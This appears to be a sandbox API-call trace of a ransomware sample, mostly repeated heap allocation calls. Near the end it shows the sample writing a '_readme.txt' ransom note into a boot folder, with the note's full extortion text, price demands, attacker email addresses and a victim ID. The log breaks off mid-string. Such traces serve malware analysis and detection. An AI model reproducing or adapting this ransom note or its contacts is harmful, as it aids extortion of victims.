hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.107] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.107] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.107] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.108] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.108] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.109] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.109] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.110] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.110] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.110] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0179.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.116] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.116] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.116] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.116] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.124] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.124] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.124] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0179.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.126] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.126] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.126] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.126] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.126] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.126] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.127] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.127] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.127] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.127] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.127] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.128] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.128] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.129] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.129] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.129] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.129] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.130] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.130] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.130] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.130] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.130] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.130] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.130] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.131] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.131] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.131] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.131] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.131] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.131] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.134] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.134] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.134] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.136] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.136] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.136] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.136] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.137] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.137] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.138] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.138] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.138] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.138] PathFindFileNameW (pszPath="C:\\Boot\\ja-JP\\") returned="ja-JP\\" [0179.138] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0179.138] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.138] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0179.138] PathFindFileNameW (pszPath="") returned="" [0179.139] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0179.139] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0179.139] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0179.139] FreeLibrary (hLibModule=0x759d0000) returned 1 [0179.139] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.139] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.140] PathAppendW (in: pszPath="C:\\Boot\\ja-JP\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 1 [0179.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.140] PathFileExistsW (pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 0 [0179.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d32670 [0179.140] lstrcpyW (in: lpString1=0x2d32670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0179.140] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never 